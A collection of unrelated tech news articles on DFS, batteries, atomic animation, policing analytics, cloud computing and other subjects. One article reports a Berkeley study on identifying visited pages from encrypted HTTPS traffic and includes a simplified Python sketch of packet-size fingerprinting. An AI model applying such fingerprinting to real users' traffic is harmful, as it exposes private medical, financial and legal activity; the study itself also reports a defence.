DFS is a service that gives administrators a way to provide users with simple access to increasingly distributed amounts of data. In this article, I will look at some of the features of DFS and how to create a DFS tree in Windows 2000.
|DFS in a Heterogeneous Environment|
The functionality of DFS is not just limited to Microsoft operating systems. For instance, if the server hosting the DFS root has access to a NetWare server through client or gateway software, directories on the NetWare server can be added to the DFS tree. This is a major advantage to administrators managing data in a heterogeneous environment.
DFS file structures can be accessed from any workstation that is running the DFS client software. This software is included with Windows 98, Windows NT 4.0, and Windows 2000. A downloadable client is available for systems running Windows 95. To take full advantage of the fault tolerance capabilities of DFS, the updated Active Directory Client Extensions must be installed for the respective client platforms.
What Is DFS?
DFS provides the ability to create a single logical directory tree from different areas of data. The data included in a DFS tree can be in any location accessible from the computer acting as the DFS root. In other words, the data can be on the same partition, disk, or server, or on a completely different server. As far as DFS is concerned, it makes no difference. A DFS tree appears as one contiguous directory structure, regardless of the logical or physical location of the data.
After the DFS root is created, links to directories can be added or removed to construct the single logical directory structure. The DFS tree can be navigated using standard file utilities such as Windows Explorer. Unless users are made aware of the fact that the data is being accessed from different locations, they will not realize that they are using a DFS system at all.
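Because the tree is exposed as an ordinary UNC path, any standard file API can walk it. As a small illustration, the Python sketch below (run from a Windows client) uses placeholder domain and root names; the links under the root may live on several servers, but the client never needs to know that.

```python
# Walk a DFS namespace exactly as if it were a single local directory tree.
# \\corp.example.com\DfsRoot is a placeholder; links below it may actually
# live on several different servers, but the client never needs to know that.
import os

DFS_ROOT = r"\\corp.example.com\DfsRoot"

for folder, subdirs, files in os.walk(DFS_ROOT):
    print(folder, "-", len(files), "files")
```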
DFS trees can be used with both FAT and NTFS partitions. If you do use NTFS, the inclusion of a file or directory in a DFS structure has no effect on security permissions.
There are two types of DFS:
- Stand-alone DFS--Refers to a DFS tree that is hosted on a single physical server, and is accessed by connecting to a DFS share point on that server. DFS configuration information is stored in the server's Registry. Stand-alone DFS provides no fault tolerance. If the server hosting the DFS root should go down, users will no longer be able to access their data unless they explicitly know where the data is stored.
- Domain DFS--Provides more functionality, including features such as replication and load-balancing capabilities. Domain DFS information is stored in Active Directory. A domain member server must act as the host for the DFS tree. By storing the domain DFS configuration in Active Directory, the server-centric nature of stand-alone DFS is removed, enabling the administrator to create DFS root replicas. If a server were to go down, users would be redirected to a DFS root replica and could continue to access the DFS tree.
|DFS Disk Space Reports|
When a DFS share is accessed, the amount of free disk space reported is that of the drive hosting the DFS root. This amount will often differ from the amount of disk space available through different areas of the DFS structure. As an administrator, this discrepancy is easy to account for, but it can be confusing for users.
Advantages of DFS
DFS brings with it advantages for both users and administrators. All the directories and files users need to access exist in one easy-to-navigate structure. This has two effects. First, users can easily locate data, reducing the need for administrative assistance. Second, users can more easily save data in the right place, thereby increasing the effectiveness of backups and reducing related support calls. From an administrative perspective, DFS provides the ability to manage data from within one simplified structure. Other benefits include the ability to move a data structure from its original location to another drive, or even another server, without affecting the DFS structure or the users' perception of the location of the data.
Creating a DFS Tree
The initial creation of a DFS tree takes just a couple of minutes, thanks to a wizard that guides you through the necessary steps. The wizard is accessed from within the Distributed File System management utility, which can be found in the Administrative Tools menu. After starting the Management Utility, choose Action|New to launch the DFS Root Creation Wizard. After you click Next on the introduction screen, the wizard prompts you to select whether to create a stand-alone DFS root or a domain DFS root. For this example, I will create a domain DFS root.
The next two screens allow you to select first the domain, and then the server that will host the DFS root. Each server can only host one DFS root. The following screen requires that you specify the share point at which you wish to create the DFS root. You can either select an existing share by using the drop-down box, or create a new share point for the DFS root. The next screen allows you to specify a name for the DFS root, and to include a comment. Clicking Next then takes you to a summary screen, in which you can check the information that has been entered. Figure 1 shows a completed summary screen. Once the information has been checked, click Finish to create the new DFS system.
Adding new links to the DFS tree is simple. With the DFS root object selected in the management utility, right-click and choose New DFS Link. Then, simply add the path to the data you want included in the DFS tree. Repeat this procedure for each data area that you wish to add to the tree. In Figure 2, you can see the view of a DFS tree with a number of links added. The left pane shows the DFS Management Utility; the right pane shows what the tree looks like when viewed through Windows Explorer.
DFS provides a simple solution to one of network administration's most time-consuming challenges: managing data access. By creating a DFS tree, Windows 2000 administrators can manage data easily. //
Drew Bird (MCT, MCNI) is a freelance instructor and technical writer. He has been working in the IT industry for 12 years and currently lives in Kelowna, Canada. You can e-mail Drew at email@example.com. | <urn:uuid:3d638ecc-5faf-43da-9237-4ccabed2998b> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/624521/Using-the-Windows-2000-Distributed-File-System.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00562-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.909112 | 1,476 | 2.71875 | 3 |
As our increasingly wireless and gadget-filled world demands better screens and more complex functions, the underlying technology that may be showing the most signs of strain is also one of the oldest: batteries. Threatened with replacement and subject to massive recalls, the battery technology that we all rely on has shown signs of draining under the stress. But help may be on the way: researchers at Argonne National Labs are presenting data (PDF) on a method that provides a big boost to existing lithium ion batteries.
The researchers were able to get charge capacities of well above 250 mAh/g (more than twice the charge held by lithium ion batteries currently on the market) simply by replacing one of the electrodes. The new electrode relies on a layered-layered structure that includes a lithium-manganese oxide component. The new material apparently transfers charge both by freeing lithium ions and by reactions involving the manganese oxide itself.
Theoretically, these reactions should add up to a charge capacity of slightly below the 250 mAh/g figure, but the authors were surprised to find that capacity came in over 300 mAh/g when tested at 50°C, leading them to term the charging behavior "anomalous." It doesn't appear that they yet understand why it works so well, as their abstract says that "possible reasons for the anomalously high capacity and the electrochemical cycling stability of these manganese-rich electrodes will be discussed in this presentation."
This new battery tech isn't ready for prime time yet, in part because the manganese reactions are predicted to damage the electrodes themselves. Even though the abstract suggests that they are unexpectedly stable, performance does decline too fast for commercial use: by 16 percent in as few as 10 charges. The reactions also produce oxygen during discharge of the battery, which will have to be gotten rid of in some way. But there's reason to think that these problems will be overcome: in addition to allowing greater power capacity, manganese is much cheaper than what's currently in use.
Imagine being able to securely open the front door to your home by simply touching the handle. Through a combination of your mobile device and your skeletal frame-which can uniquely identify you — this can happen today. No need to fumble through your belongings to find your keys or your cell phone — a device on your body, such as a watch, could do the unlocking for you. Need to transfer secure data or exchange information with a colleague or friend quickly? It can happen with a simple handshake — literally. Researchers in AT&T Labs are developing new technologies that allow all of this to happen.
How did the Idea Hatch?
The prototype for this technology is based on previous work in AT&T Labs that involved recognizing soft fingertip gestures (tap, rub, etc.) by listening to the sounds they make using a piezo-electric transducer. While testing the gesture recognizer, researchers transmitted music through the body to calibrate the system and realized that this idea could be extended to transmit data from body to solid object or body to body using vibrations.
About the Project
Bio-acoustic Data Transfer is demonstrated by key transmission through bone conduction. This is done by attaching a piezo-electric transducer to a mobile device, watch or other devices. When the user approaches the door, a unique digital key will be transferred to the lock. If the key matches, the deadbolt will unlock. This is made possible by a person's unique skeletal structure and bone density, so if the key is stolen it will not work for the intruder.
Additional research into Bio-acoustic Data Transfer is underway to ensure the accuracy of unlocking a deadbolt, as well as data transfer of short messages, like contact information. In the future, AT&T Labs researchers foresee multiple advancements in this technology, including:
- Handshake Data Transfer. While shaking someone's hand for the first time your contact information or any other data that you wish to share, could be sent from one body to the other.
- A safer home. If an intruder tried to enter your home, alerts could be sent through your mobile device to let you know.
- Eliminating clutter. By essentially combining your house key and mobile phone, there is less of a hassle for a user by eliminating the need for a key.
- Transferring data between devices. Alternatively to transferring data between individuals, this technology allows for easy document transfers between your devices, such as tablets and mobile phones.
About the Researcher
Brian Amento has been a Principal Technical Staff Member at AT&T Labs — Research for 14 years, working in the Human Computer Interface Research group. Brian received his PhD in Computer Science from Virginia Polytechnic Institute and State University. His research interests include novel interaction techniques, mining implicit social data and enabling ubiquitous collaboration. He has served as an adjunct faculty member at New York University and is currently a research professor at the New Jersey Institute of Technology. His current research work includes collaborative music listening, vibration based networking, and large multi-touch surface interfaces.
Atom manipulation makes for world record.
IBM (NYSE:IBM) produces the worst animated movie I've ever seen. Terrible production values, laughable plot, and awful soundtrack. At least it's mercifully short. Two thumbs down. Still, it does at least show what's possible when you manipulate and photograph individual atoms.
In IT Blogwatch, bloggers think... and make Heisenberg gags.
Your humble blogwatcher curated these bloggy bits for your entertainment.
Seth Borenstein reports:
Scientists have taken the idea of a film short down to new levels. ... IBM says it has made the tiniest stop-motion movie ever [made] of individual carbon monoxide molecules.
...Each frame measures 45 by 25 nanometers — there are 25 million nanometers in an inch. ... IBM used a remotely operated two-ton scanning tunneling microscope...at 450 degrees below zero Fahrenheit (268 degrees below zero Celsius).
Jason Palmer speaks unto nation:
The stop-motion animation uses a few dozen carbon atoms, moved around with the tiny tip of...a scanning tunnelling microscope. ... The extraordinary feat of atomic precision has been certified by the Guinness Book of World Records. ... The device works by passing an electrically charged, phenomenally sharp metal needle across the surface. ... As the tip nears features on the surface, the charge can "jump the gap" in a quantum physics effect called tunnelling.
...It underlines the growing ability of scientists to manipulate matter on the atomic level, which IBM scientists hope to use to create future data storage solutions.
SPOILER WARNING: Daniel Terdiman tells us the plot:
Called "A boy and his atom," the animated film features a small boy having a good old time as he bounces around, playing catch, and dancing [in] 130 atoms that were painstakingly placed, atom by atom.
...four researchers spent nine 18-hour days moving the 130 atoms around so they could create the exact imagery they needed for their film.
Yes, yes. Great fun, but WHY, Gareth Halfacree?
It's not all about frivolity and the kudos that comes with an unlikely entry in the Guinness Book of World Records, though. ... IBM is hoping that the technology...will pave the way forward for novel computer circuits that can bypass the rapidly-approaching physical limits that threaten to put an end to Moore's Law.
...The team behind the animation has already created the world's smallest magnetic bit, constructed from just 12 atoms - compared to the million atoms a traditional bit takes up on a mechanical hard drive.
Meanwhile, ifeu quips, uncertainly:
So... did the boy act differently when he was watched?
University researchers have developed a technique that governments and Internet service providers could use to bypass secured Internet connections and gather valuable personal information.
The "analysis attack" on HTTPS traffic had an 89 percent accuracy rate in determining the Web pages a person visited, according to University of California, Berkeley, researchers. Such tracking made it possible for the researchers to gather information on medical conditions, sexual orientation, financial status and whether a person is involved in a divorce or bankruptcy proceeding.
The study looked at more than 463,000 page loads on 10 widely used, industry-leading websites. Healthcare sites included those of the Mayo Clinic, Planned Parenthood and Kaiser Permanente; financial sites belonged to Wells Fargo, Bank of America and Vanguard; legal services sites belonged to the American Civil Liberties Union and Legal Zoom; and video-streaming sites included Netflix and YouTube.
For the attack to work, snoops would have to be able to visit the same Web pages as the victim, which would enable the attackers to identify packet patterns in encrypted traffic that would be indicative of different Web pages.
"It would be like if somebody gave you a bicycle but took it apart and wrapped each piece individually," Brad Miller, co-author of the study told CSOonline Monday. "You would quickly notice that there were two big packages which look like wheels, a frame, a squiggly one that corresponds to a chain, etc.
"It's the same way with a Web page. Because we watch each of the parts be delivered individually, there ends up being so much information which you can observe without decrypting the packets that you can quite likely figure out the exact Web page."
The attackers must also be able to observe victim traffic, which would allow them to match those packet patterns with the ones going to particular Web pages.
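In rough outline, the attack builds a library of packet-size patterns by loading each candidate page itself and then matches an observed, still-encrypted trace against that library. The sketch below is heavily simplified, with invented packet sizes; the study's actual classifier used far more sophisticated statistical features.

```python
# Toy traffic-analysis attack: identify a page from encrypted traffic using
# only the sizes of the packets, never their contents. Packet sizes are invented.
from collections import Counter

def profile(packet_sizes, bucket=100):
    """Histogram of packet sizes, bucketed to tolerate small variations."""
    return Counter(size // bucket for size in packet_sizes)

# Step 1: attacker loads candidate pages and records their packet-size patterns.
fingerprints = {
    "bank.example/loans":   profile([1500, 1500, 1500, 900, 300, 1500, 1200]),
    "bank.example/savings": profile([400, 400, 300, 1500, 200, 250]),
}

def identify(observed_sizes):
    obs = profile(observed_sizes)
    def distance(fp):
        keys = set(obs) | set(fp)
        return sum(abs(obs[k] - fp[k]) for k in keys)
    return min(fingerprints, key=lambda page: distance(fingerprints[page]))

# Step 2: match a victim's encrypted trace against the library.
victim_trace = [1500, 1500, 1450, 900, 310, 1500, 1180]
print(identify(victim_trace))   # -> "bank.example/loans"
```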
The researchers also developed a defense that involved reducing the amount of packet information an attacker could gather. The technique lowered the accuracy of identifying Web pages visited by people from 89 percent to 27 percent.
The research has important privacy implications. Being able to examine user activity on a healthcare site could reveal medical conditions, which could lead to discrimination or could be sold to advertisers looking to pitch products.
Monitoring legal site traffic could uncover a divorce, bankruptcy or immigration status, while analyzing traffic on a banking site could provide insight on whether a person has children, is in a long-term relationship or is in a high-income bracket.
Any company with access to HTTPS traffic, such as Internet service providers and commercial chains of Wi-Fi access points, could gather data on users despite the encryption and sell the information to advertisers, the study said.
Employers could monitor the activities of employees while they are on the corporate network, regardless whether they are using a personal or employer-issued device.
Finally, governments could find the collected information useful to find criminals and to punish political dissidents or people who defy censors, the study said. In China, for example, the social media firm Sina recently punished more than 100,000 users through account suspensions and occasional public admonishment for violating the government's guidelines for Internet use.
This story, "Researchers Attack Secured Internet Activity to Mine Personal Data" was originally published by CSO. | <urn:uuid:f9a0dea0-b78a-42bf-973d-f9b0b68ed3cc> | CC-MAIN-2017-09 | http://www.cio.com/article/2378010/security0/researchers-attack-secured-internet-activity-to-mine-personal-data.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00082-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949884 | 654 | 2.59375 | 3 |
Google has entered into a partnership with Douglasville- Douglas County Water and Sewer Authority to recycle greywater for cooling its data center in Douglas County, Georgia. Greywater is the water that is recycled from showers and bathtubs from residential facilities. Normally, this greywater finds its way into the River Chattahoochee.
The rationale behind using such water is that water for cooling purposes need not be sterile or fit for drinking. Google has therefore invested in building a sidestream treatment plant that takes in this greywater and puts it through a process of sterilization, filtration and chlorination, cleaning it for use in its evaporative cooling towers.
Google has taken this a step further by putting the water that does not evaporate during this process through an Effluent Treatment Plant which disinfects and cleans it of particulate matter and then pumps it into the Chattahoochee River.
With this water purification and utilization system, Google has created a 100% recycled water plant for its own operations.
What's the difference between a robotic car made by Google, and the ones made by actual carmakers? The future, as always, was on display at the Consumer Electronics Show today, where Toyota and Audi unveiled their new autonomous cars of the future — concepts that should not be confused with the Google version, which is a self-driving car. Now, they're pretty much the same thing, with a series of sensors and automated controls that let a car think and act on its own. The much discussed Google car has a camera on top with a special LIDAR sensor and so does Toyota's new Lexus LS sedan. What the Google car doesn't have is a name like the Lexus's: Advanced Active Safety Research Vehicle.
Google chief Eric Schmidt has said that he thinks cars should be able to drive themselves. The auto industry would still like to sell you a driving machine, thank you very much — and make them a lot safer. This may or may not have a lot to do with Toyota's recent struggles based on safety concerns. (Google also uses the Toyota Prius for its robot-driven car.) But, hey, the Lexus is still very cool, what with the high-definition cameras that can detect traffic signals from over 160 yards away, front- and side-facing radar, and sensors that can precisely track the orientation of the car at all times. That sounds pretty accident-proof: When nothing feels wrong, the car lets the driver do the work; when it perceives a threat, the robotic system kicks in.
As you can see with this video of Audi's Pikes Peak TTS research car, the autonomous cars of the industry's future can drive on their own — but they won't.
While Google insists that its robotic chauffeurs will make driving safer by leaving humans out of the driver's seat altogether, a lot of people don't believe that. Plus, when things go wrong, the legal implications get blurry. Humans behind the wheel make a lot of ethical questions disappear — and robot back-up might make people feel better just in case. Plus, having a robot do all the work takes the fun out of driving anyway, right? | <urn:uuid:537722a1-9b41-4980-bbca-e71ba1c48935> | CC-MAIN-2017-09 | http://www.nextgov.com/emerging-tech/2013/01/auto-industry-drops-robot-chauffeurs-favor-safest-car-all-time/60558/?oref=ng-relatedstories | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00310-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.969751 | 443 | 2.53125 | 3 |
Microsoft's research division has developed a keyboard that can interpret basic hand gestures, potentially bridging a gap between touch devices and more traditional input methods.
[See the keyboard in action in a video on YouTube.]
Presented at the Computer Human Interaction (CHI) conference in Toronto, the prototype keyboard has 64 sensors that detect the movement of hands as they brush over the top of the keyboard. Swiping a hand over the left or right side, for instance, can bring up left and right side menus in Windows 8.
The main goal is for users to be able to keep their hands on or very close to the keyboard while typing and using input gestures, said Stuart Taylor, a Microsoft senior research engineer.
Some of the gestures can replace existing keyboard shortcuts, like the Alt and Tab combination for switching between applications.
"What we've found is that for some of the more complicated keyboard shortcut combinations, performing gestures seems to be a lot less overhead for the user," he said.
Gesture control in touchscreens is commonplace for tasks like flicking through photos or pulling up menus. Even some mice can interpret gestures, but keyboards have largely stuck to their traditional input method.
Taylor said Microsoft's keyboard can interpret a number of gestures, though only a few were working at the conference in Toronto. He also said it's not designed to replace a mouse.
"It's less about fine-grain navigation, which would still be performed with a mouse or touchpad," he said.
The team has been working on the project for about a year-and-a-half and will continue to refine the gesture interpretation. The sensors on the keyboard are in pairs, with one sensor emitting infrared light and the other reading the light reflected back. It's not unlike the technology in Microsoft's Kinect gaming system.
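Microsoft has not published the prototype's algorithm, but a much-simplified sketch of the general idea follows: treat each frame as a row of reflectance readings, track where the hand's weight sits, and call it a swipe when that position moves steadily across the keyboard. All sensor values below are invented.

```python
# Toy swipe detector for a keyboard with a row of proximity sensors.
# Each frame is a list of sensor readings (higher = hand closer); we track the
# weighted centre of the readings over time and look for steady sideways motion.

def centroid(frame):
    total = sum(frame)
    if total == 0:
        return None                       # no hand over the keyboard
    return sum(i * v for i, v in enumerate(frame)) / total

def detect_swipe(frames, min_travel=3.0):
    positions = [c for c in (centroid(f) for f in frames) if c is not None]
    if len(positions) < 2:
        return "none"
    travel = positions[-1] - positions[0]
    if travel > min_travel:
        return "swipe right"
    if travel < -min_travel:
        return "swipe left"
    return "none"

# Simulated frames from 8 sensors as a hand sweeps left to right.
frames = [
    [9, 7, 2, 0, 0, 0, 0, 0],
    [2, 8, 9, 4, 1, 0, 0, 0],
    [0, 1, 5, 9, 8, 3, 0, 0],
    [0, 0, 0, 2, 7, 9, 8, 2],
]
print(detect_swipe(frames))   # -> "swipe right"
```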
Since it is still a research project there are no immediate plans for commercialization, but technology like this could give Microsoft a much-needed leg up in the computing race. | <urn:uuid:baea2dfe-3bd7-45fe-ac52-15c35c4c756a> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2176493/data-center/microsoft--39-s-prototype-keyboard-understands-gestures.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00606-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.942638 | 405 | 2.921875 | 3 |
Using statistics and analytical data to predict criminal activity has become standard practice in many police departments across the United States. Crime forecasting may get more accurate as new computer algorithms are developed, but experts believe that fresh data streams, not technology advancements, will drive innovation in predictive policing during the next 20 years.
Analysts currently identify crime trends using statistical data on arrests and 911 calls. Based on that information, police commanders deploy officers to areas they believe will be hot spots for illegal activities. But while predictive in nature, the effort is largely reactionary based on past events.
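A minimal sketch of that kind of hot-spot analysis, assuming incidents arrive as simple latitude/longitude pairs, might aggregate counts into grid cells and rank them; real systems weight by recency, crime type, and much more.

```python
# Hypothetical illustration of grid-based hot-spot ranking. The cell size and the
# sample coordinates are assumptions, not any department's actual method or data.
from collections import Counter

def hot_spots(incidents, cell=0.005, top_n=5):
    """Rank grid cells by incident count.

    incidents: iterable of (latitude, longitude) pairs from arrest and 911 data.
    cell: grid cell size in degrees (roughly 500 m at mid-latitudes).
    """
    counts = Counter((round(lat / cell), round(lon / cell)) for lat, lon in incidents)
    # return approximate cell-centre coordinates with their counts
    return [((r * cell, c * cell), n) for (r, c), n in counts.most_common(top_n)]

calls = [(39.0997, -94.5786), (39.1001, -94.5790), (39.0402, -94.5500)]
print(hot_spots(calls, top_n=2))
```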
In the future, behavioral data and clues from virtual interactions may help cops stop bad guys before they’ve even drawn up a plan. Think Minority Report — the 2002 film where a police unit was able to arrest murderers before they committed a crime — on a more realistic scale.
We’re not quite there yet, however. The ability to accurately state that a crime will occur at a specific time in a small area is still very much science fiction. In reality, the process is similar to economic forecasting where different factors are compiled to build a statistical model to predict outcomes.
More sophisticated modeling can be done, but the return on investment is likely marginal as we’re close to the limits of accuracy with current data, according to John Hollywood, operations researcher with RAND Corp., a nonprofit organization that helps improve policy and decision-making through research and analysis.
“In order to really get into crystal-ball accuracy, you basically need to get inside peoples’ heads,” Hollywood said. “That is getting you out of the realm of statistics and computer science and much more into the realm of behavioral and social science.”
Noah Fritz, past president of the International Association of Crime Analysts and crime analysis manager for the San Diego County, Calif., Sheriff’s Department, agreed. He said there is potential for growth in the area of environmental criminology where you examine a person’s journey to a life of crime and peoples’ routine activities and habits.
“We all have routines, and if we make better sense of those routines I think we can then predict and forecast how many days out a person is going to commit another crime,” Fritz said. “Whether this is because they are addicted to drugs or because they have a propensity, in some ways we [need to] just do a better job of matching the temporal pattern and the geographic patterns together.”
Some hurdles remain, however. Fritz said privacy rights may impede some behavioral data progress and the U.S. doesn’t invest enough in behavioral data research and how it ties with predictive analytics.
But the work isn’t being ignored.
Overland Park, Kan., Police Chief John Douglass likened the efforts being made in behavioral data and its relation to predictive policing to cancer research. Just as cancer scientists look back in time through genetics to find common denominators so they can create a cure, Douglass said data scientists are doing the same thing by looking for criminal signatures and those factors that will help better predict criminal behavior.
One potential source for new data could be the Level of Service Inventory-Revised (LSI-R) Assessment. An internationally recognized quantitative survey of offender attributes and offender situations relevant for making decisions about levels of supervision and treatment, the LSI-R results could provide valuable data on what motivates a criminal to commit a crime. The assessment is typically given to those going on parole.
Dawn Clausius, police intelligence analyst with the Olathe, Kan., Police Department, believes that the assessment holds a mountain of untapped data for predictive policing efforts. She said that currently a prisoner’s assessment results are used only by parole officers or counselors within specific facilities. But eventually the data could be shared with detectives or police officers.
Local, state and federal government entities must get together with state corrections departments and law enforcement personnel and make an effort to share the information, Clausius said.
Instead of just identifying and arresting the bad guy, Clausius believes that if cops had the resources and ability to sit down with criminals and find out what motivated them, they could acquire data that could help prevent future crimes.
Some work is being done in the U.S. to examine how offenders behave and places they frequent in a community. Applications exist where an algorithm can provide an idea where an offender might live in relation to where crimes are occurring. But Clausius would like to see that work done on a more micro-level.
“I think that it is just a matter of making the offenders’ behavior and personality a part of the process,” Clausius said. “If you go overseas and see the intelligence being done, they look at a lot of offender behavior and offender profiles.”
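The offender-location applications mentioned above typically rely on distance-decay models, of which Rossmo's formula is the best-known example. The sketch below is a heavily simplified, illustrative version of that idea; the buffer and decay parameters are arbitrary assumptions, not values from any deployed system.

```python
# Heavily simplified, illustrative distance-decay scoring in the spirit of
# Rossmo-style geographic profiling; buffer and decay values are arbitrary.
import math

def profile_score(candidate, crime_sites, buffer_km=0.5, decay=1.5):
    """Score a candidate anchor point (e.g., a possible home base) for a crime series.

    candidate and crime_sites are (x, y) positions in kilometres. The model
    assumes offenders avoid a small buffer zone around home and offend less
    often as distance grows beyond it.
    """
    score = 0.0
    for cx, cy in crime_sites:
        d = math.hypot(candidate[0] - cx, candidate[1] - cy)
        if d < buffer_km:
            score += d / buffer_km              # rises toward the buffer edge
        else:
            score += (buffer_km / d) ** decay   # decays with distance beyond it
    return score

series = [(1.2, 0.8), (2.1, 1.4), (0.9, 1.9)]
print(profile_score((1.4, 1.3), series))
```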
Douglass agreed. He expects nontraditional information for predictive policing to come from more study of social behaviors. It’ll just take some time to make it a reality in the U.S. For example, Douglass said it took years for law enforcement to realize that 80 percent of homicides are committed by people who know the victim. That revelation came 25 years ago.
Only recently have police officers started to realize that many homicides in big cities are connected to others in the same vicinity going back a decade. Douglass said that in Kansas City, investigators were able to trace a string of 40 or 50 murders over a 15-year period back to one specific incident.
“Many of these homicides are located in a geographical area amongst a group of people who are simply retaliating back and forth in a culture where they don’t tell the police what is going on,” Douglass said. “That becomes the remedy, and consequently all these homicides are related.”
“I think that the social scientist will be able to help us determine social patterns that we will be able to take advantage of,” he added.
Social networks and virtual environments are another source of unexploited data that experts believe will impact predictive policing in the future. Platforms such as Twitter and Facebook are based on the concept of sharing details — information that law enforcement is hoping it can capitalize on.
Leonard Scott, former police chief of Corpus Christi, Texas, thinks the data gleaned from observing social media will fundamentally alter the way commanders assign patrols to certain areas.
Instead of officers being dispatched to a particular location in response to an event, the information taken from virtual existences will be used to assign a “flex unit” that will move into an area within a half mile of a particular location and watch for various disturbances. Those units are an extension of predictive policing based on social media data streams.
Clausius agreed, but said mining social media will be more difficult as time goes on. Many people are locking down their social media accounts so that data isn’t as readily accessible, but she says law enforcement still must figure out how to tap deeper into the information that social networks can provide.
One might assume that criminals would be smart enough to vary where they spend their time, particularly if cops are homing in on new sources of information that may pinpoint the likelihood of a crime occurring in an area. But Colleen McCue, senior director of social science and quantitative methods for GeoEye, a geospatial services firm, said it’s unlikely.
McCue, author of Data Mining and Predictive Analysis: Intelligence Gathering and Crime Analysis, explained that humans are aware of a vast majority of their behaviors, but location preferences tend to be subtle and unconscious in many cases.
For example, at a grocery store, next to the bananas, you might see a display of Nilla Wafer cookies, which go well with the fruit. McCue described that type of product placement as a method of optimizing decision-making. Criminals have the same type of decision process that is largely unconscious.
“Even if they are aware of what they are doing, it is very difficult to bypass some of those unconscious decision processes,” McCue said. “It is very difficult to engage in truly random behavior, and it is that fact that makes the whole crime analyst thing work.”
Virtual gaming is another arena Clausius believes will be a gold mine for data in the next decade or two. From gambling sites to independent virtual identities to trade money for crime, Clausius thinks cyberspace is ripe for the picking when it comes to data to improve predictive policing efforts.
“I don’t think law enforcement and public safety have even tapped into that as far as a data source or intelligence,” she said. “There are all kinds of games for all different purposes … and maybe on a federal level they are already gaming and in those worlds, but from a local law enforcement level, we are not in any of that.”
New data may drive the future of predictive policing, but technology won’t stand still. Paul Steinberg, CTO of Motorola Solutions, says the ways officers gather data and receive instruction will radically change in the next few decades. Steinberg said he envisions much more mobile technology use — far beyond the laptops and smartphones that cops carry today.
From RFID-based fabrics to advanced hands-free mobile platforms, Steinberg believes technology will become an extension of a person, rather than separate devices he or she carries. For example, Motorola is discussing how to embed display technology into an optical unit that can capture and relay information to a police officer.
It could be something similar to Google Goggles, but specifically designed for cops and emergency personnel. So when first responders arrive on a scene, their reality is augmented with technology that increases situational awareness.
“It is the kind of thing you are going to see a lot more of,” Steinberg said. “People are not going to want to carry the devices; they are going to want to wear them and have them be as unobtrusive as possible.”
Clausius cautioned that new technology needs to be deployed in ways that don’t compromise officer safety. Having been an officer herself for nine years, she said that the job is to respond to a situation and focus on street-level issues.
“We need to provide them the tools that make their job easier, but we also need to keep in mind it is a safety issue,” Clausius said. “If they are being thrown so much information that they are taking their eyes off the suspect or off the road, we might actually be causing more problems.”
One science fiction element not likely to be a part of predictive policing in the next 20 years is computer-based decision-making. While complex algorithms will be used to evaluate mountains of new data, both police and researchers believe advanced computers and artificial intelligence won’t be at a level where they’d feel comfortable trusting machines to make deployment decisions.
Douglass spotlighted WarGames — the 1983 film starring Matthew Broderick where a military computer confused reality with a simulation and almost annihilated the world with nuclear missiles — as a still-viable lesson for future generations.
“We have not been able to automate intuition into computers — they are a binary, two-dimensional look at things,” Douglass said. “The human element adds that quality of intuition that I don’t think is dispensable. I think [the data] is always going to need some human interpretation.”
Clausius and McCue agreed. Clausius said that despite the likelihood of further artificial intelligence advancements, computers should remain a tool and the human element should always be present.
McCue added that from an operational public safety and national security perspective, she’d be troubled by the automation of police resources and deployment decisions.
“I don’t see in my lifetime getting to the point where we can develop a machine-learning algorithm that would be able to select the tactics and strategy that you would use to address a particular scenario,” McCue said.
Fritz pointed out that while computers have been shown to make independent decisions, they’re usually governed by a defined set of rules. For example, in chess, a computer can make choices and anticipate moves based on those rules.
But in the criminal world, offenders don’t always adhere to a plan, which makes a human’s adaptive ability necessary.
Scott concurred that humans need to be part of the equation when it comes to making predictive policing decisions based on data. But he felt it was inevitable that computers would at some point be used for low-level decision-making.
So did Hollywood, but he was confident that actual strategy would always be decided by humans.
“Computer assistance and artificial intelligence in the field is kind of becoming the information technology equivalent of replacing shovels with … bulldozers,” Hollywood said. “You have more power and ability to process larger amounts of data and do basic operations faster. At the same time … you still need somebody driving the bulldozer.”
Bridging Private and Public Clouds
Scaling IT means using tools and services on both sides of the cloud divide.
A divide as real as any weather front separates private, wholly owned data centers from public, capacity-for-hire cloud providers. There is a role for IT in creating a bridge across this divide as virtualization of all types enables more efficient application development, virtual machine provisioning and business continuity. A bridged private/public cloud promises efficient workload relocation and an evolutionary path to more cost-effective IT operations. However, the challenges to building a bridge between private and public clouds are real. Aside from the emerging nature of cloud computing technology, IT managers must work with developers and business managers to ensure that development platforms, management controls and compliance issues are aligned between the private and public platforms in order to reap these benefits.
Why Build a Bridge?
Application development was among the first beneficiaries of x86 server virtualization and set the stage for running infrastructure on site and in a hosted environment. Setting up test and development environments composed of virtual machines that could be rapidly provisioned and de-provisioned on shared resources was also a driver for using public cloud services, including AWS (Amazon Web Services). Corporate users can use architectural guides today to move workloads from private to public, enterprise-class cloud providers. For example, VMware partners with public cloud infrastructure providers including Bluelock, CSC, Terremark and others using its VMware vCloud Data Center Services. In this case, the private/public cloud bridge connects infrastructure (usually processing, storage and networks) or platform (which usually adds the operating system and database) so that applications can be built using familiar tools. These cloud "as a service" offerings are referred to as IAAS (infrastructure as a service) and PAAS (platform as a service).
One of the earliest thoughts behind creating a bridge between a private and public cloud IAAS or PAAS implementation was to support essential computing workloads without buying all the underlying hardware infrastructure. An early example of this was "cloud bursting," or the on-demand creation of IT systems to support peak demands. It turns out that workloads are more likely to expand and contract within either the private or the public cloud than to move across the boundary on a bridge. However, this could become an effective use case in the near future if ODCA virtual machine portability guidelines are broadly adopted. For now, this functionality usually needs to be built into the application.
